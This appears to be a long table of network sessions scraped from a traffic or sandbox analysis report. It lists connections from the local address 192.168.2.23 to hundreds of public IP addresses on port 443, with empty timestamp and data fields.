                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21023192.168.2.2339474169.213.17.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21024192.168.2.2346840124.244.231.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21025192.168.2.234694684.82.8.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21026192.168.2.2352236204.157.34.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21027192.168.2.234857691.154.94.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21028192.168.2.2339046195.116.225.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21029192.168.2.2346746155.181.246.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21030192.168.2.2345252154.222.132.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21031192.168.2.234412874.249.48.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21032192.168.2.2360144199.76.115.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21033192.168.2.2354056217.255.59.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21034192.168.2.233465884.159.221.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21035192.168.2.2351052152.128.253.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21036192.168.2.2350204146.106.116.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21037192.168.2.2341092114.111.95.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21038192.168.2.2358762139.20.130.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21039192.168.2.233442877.91.238.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21040192.168.2.2344768146.144.242.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21041192.168.2.236001486.251.221.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21042192.168.2.2351196193.161.32.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21043192.168.2.2349322178.106.101.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21044192.168.2.2354494154.41.72.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21045192.168.2.2360482124.110.81.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21046192.168.2.2351766152.78.249.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21047192.168.2.2352410179.52.26.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21048192.168.2.2349488106.45.97.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21049192.168.2.2334392217.187.90.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21050192.168.2.234086662.11.147.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21051192.168.2.234142283.27.169.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21052192.168.2.2357176132.2.15.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21053192.168.2.234106614.228.118.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21054192.168.2.234021239.193.199.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21055192.168.2.2352344145.223.219.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21056192.168.2.2352990105.47.216.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21057192.168.2.2347074136.239.164.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21058192.168.2.234064671.200.146.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21059192.168.2.2339644142.201.88.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21060192.168.2.235498063.104.240.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21061192.168.2.2336408210.161.185.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21062192.168.2.2333462187.41.135.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21063192.168.2.2354678116.87.147.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21064192.168.2.2335340163.160.164.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21065192.168.2.2357090202.47.74.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21066192.168.2.234515813.39.29.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21067192.168.2.2350016207.110.43.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21068192.168.2.2339416165.110.5.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21069192.168.2.2332838100.219.15.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21070192.168.2.234413014.108.127.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21071192.168.2.235761648.22.213.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21072192.168.2.235940654.52.94.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21073192.168.2.235512897.146.205.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21074192.168.2.2352766212.175.218.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21075192.168.2.2334158124.49.59.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21076192.168.2.2346396202.142.181.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21077192.168.2.2335534143.179.132.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21078192.168.2.2334302160.141.78.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21079192.168.2.2345216151.21.150.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21080192.168.2.2338802139.206.124.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21081192.168.2.234743275.84.187.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21082192.168.2.2354264194.162.236.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21083192.168.2.2340508190.242.28.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21084192.168.2.2356096222.48.209.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21085192.168.2.2358972173.111.7.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21086192.168.2.234877677.58.217.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21087192.168.2.2343852118.232.233.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21088192.168.2.233898057.105.216.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21089192.168.2.234107694.122.241.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21090192.168.2.2348684131.119.81.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21091192.168.2.2334558118.234.57.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21092192.168.2.2351960180.176.242.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21093192.168.2.2359902176.112.82.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21094192.168.2.2340968108.79.190.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21095192.168.2.2351670102.246.42.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21096192.168.2.2340832101.47.94.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21097192.168.2.2353686197.207.103.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21098192.168.2.234092671.119.169.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21099192.168.2.235667080.192.207.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21100192.168.2.2360296155.255.0.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21101192.168.2.2340618182.205.223.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21102192.168.2.2334176119.162.152.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21103192.168.2.2357616213.143.211.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21104192.168.2.235064698.37.93.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21105192.168.2.235550424.83.238.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21106192.168.2.2333694204.238.65.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21107192.168.2.234964235.107.145.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21108192.168.2.2344690135.202.206.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21109192.168.2.23426182.76.172.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21110192.168.2.2345932199.219.46.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21111192.168.2.2338058166.48.29.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21112192.168.2.2342054131.192.147.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21113192.168.2.2355722116.175.191.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21114192.168.2.2349186171.221.183.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21115192.168.2.235876671.12.11.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21116192.168.2.2349616161.255.63.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21117192.168.2.234344088.40.131.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21118192.168.2.2343808133.99.134.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21119192.168.2.2345086145.110.183.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21120192.168.2.2342934109.252.225.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21121192.168.2.2334914141.57.170.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21122192.168.2.233659878.28.124.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21123192.168.2.234600890.112.100.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21124192.168.2.235099623.42.106.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21125192.168.2.234691467.175.134.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21126192.168.2.2352676115.174.34.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21127192.168.2.2340266125.117.92.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21128192.168.2.2352350138.23.56.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21129192.168.2.2335824129.38.130.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21130192.168.2.233561443.58.111.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21131192.168.2.233612219.194.125.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21132192.168.2.2357256196.209.88.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21133192.168.2.233860445.185.39.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21134192.168.2.2344312104.54.6.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21135192.168.2.2355270102.126.95.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21136192.168.2.2333528165.237.156.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21137192.168.2.2338320150.193.5.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21138192.168.2.2339046111.201.206.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21139192.168.2.2358160204.90.22.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21140192.168.2.2340454164.221.254.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21141192.168.2.235931837.71.8.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21142192.168.2.235798861.162.204.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21143192.168.2.233561457.83.226.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21144192.168.2.2337912179.160.62.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21145192.168.2.2337214164.120.153.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21146192.168.2.2335012111.236.249.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21147192.168.2.233547689.197.136.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21148192.168.2.2349250172.61.145.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21149192.168.2.234280234.211.131.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21150192.168.2.235841294.17.45.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21151192.168.2.235198492.199.60.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21152192.168.2.234657045.37.154.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21153192.168.2.2360324184.104.80.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21154192.168.2.233883631.232.138.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21155192.168.2.2342236154.0.20.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21156192.168.2.2336470222.116.21.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21157192.168.2.2344958128.19.249.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21158192.168.2.2355894105.178.109.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21159192.168.2.234361836.253.144.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21160192.168.2.2348596160.121.209.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21161192.168.2.234923895.36.109.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21162192.168.2.2348804102.9.71.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21163192.168.2.2351596205.137.234.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21164192.168.2.2340696220.19.109.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21165192.168.2.2340948156.84.242.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21166192.168.2.2345998100.10.153.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21167192.168.2.2343560134.52.4.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21168192.168.2.2342020179.149.255.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21169192.168.2.2343294186.64.244.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21170192.168.2.235764866.217.96.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21171192.168.2.2357136168.186.91.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21172192.168.2.2334838193.18.211.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21173192.168.2.2339432131.96.177.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21174192.168.2.2339366172.106.184.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21175192.168.2.2340918198.83.44.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21176192.168.2.2333728201.152.0.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21177192.168.2.2356622112.229.183.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21178192.168.2.233937037.227.3.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21179192.168.2.2358312121.206.255.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21180192.168.2.2345148207.193.54.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21181192.168.2.2339638102.200.38.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21182192.168.2.2356778109.56.26.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21183192.168.2.2346214156.239.174.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21184192.168.2.2335958201.89.88.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21185192.168.2.2355426134.179.224.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21186192.168.2.236037446.143.2.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21187192.168.2.2341820166.91.144.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21188192.168.2.2341942104.31.71.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21189192.168.2.235196095.120.191.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21190192.168.2.2357808123.127.170.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21191192.168.2.2359496181.177.94.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192192.168.2.234261240.76.200.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21193192.168.2.2346006145.57.180.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21194192.168.2.235895887.70.130.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21195192.168.2.234669465.250.20.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21196192.168.2.2348176176.191.235.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21197192.168.2.2335484132.4.20.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21198192.168.2.2340954125.136.183.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21199192.168.2.2341032128.233.87.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21200192.168.2.2346614154.16.69.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21201192.168.2.2337624139.186.44.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21202192.168.2.2336218218.69.61.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21203192.168.2.233501093.230.41.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21204192.168.2.233302242.61.6.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21205192.168.2.2356110189.107.239.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21206192.168.2.233950461.245.3.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21207192.168.2.2352006169.39.35.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21208192.168.2.2339396118.18.51.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21209192.168.2.2355848203.171.233.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21210192.168.2.2343738216.100.22.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21211192.168.2.2352804126.45.213.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21212192.168.2.233845067.41.245.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21213192.168.2.2353604179.105.159.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21214192.168.2.235934693.231.82.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21215192.168.2.2355512147.91.25.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21216192.168.2.2351644174.158.210.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21217192.168.2.233699698.96.193.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21218192.168.2.2344446140.117.24.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21219192.168.2.235829484.109.156.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21220192.168.2.2353382153.46.180.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21221192.168.2.2334500197.135.166.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21222192.168.2.2350938178.155.120.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21223192.168.2.2345678165.9.120.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21224192.168.2.235883699.246.181.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21225192.168.2.2336918163.161.87.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21226192.168.2.2358664188.123.186.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21227192.168.2.2352472150.201.90.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21228192.168.2.2347016141.8.185.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21229192.168.2.235316442.80.253.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21230192.168.2.2355652175.40.201.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21231192.168.2.2348532207.188.217.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21232192.168.2.2336224207.95.53.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21233192.168.2.2352450159.175.13.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21234192.168.2.2335678190.136.220.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21235192.168.2.234721073.101.99.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21236192.168.2.234075446.180.75.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21237192.168.2.234474259.173.96.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21238192.168.2.233709214.25.28.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21239192.168.2.2357238184.180.16.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21240192.168.2.2350450123.122.43.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21241192.168.2.2349076199.78.189.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21242192.168.2.2348744129.76.173.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21243192.168.2.2345642149.161.161.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
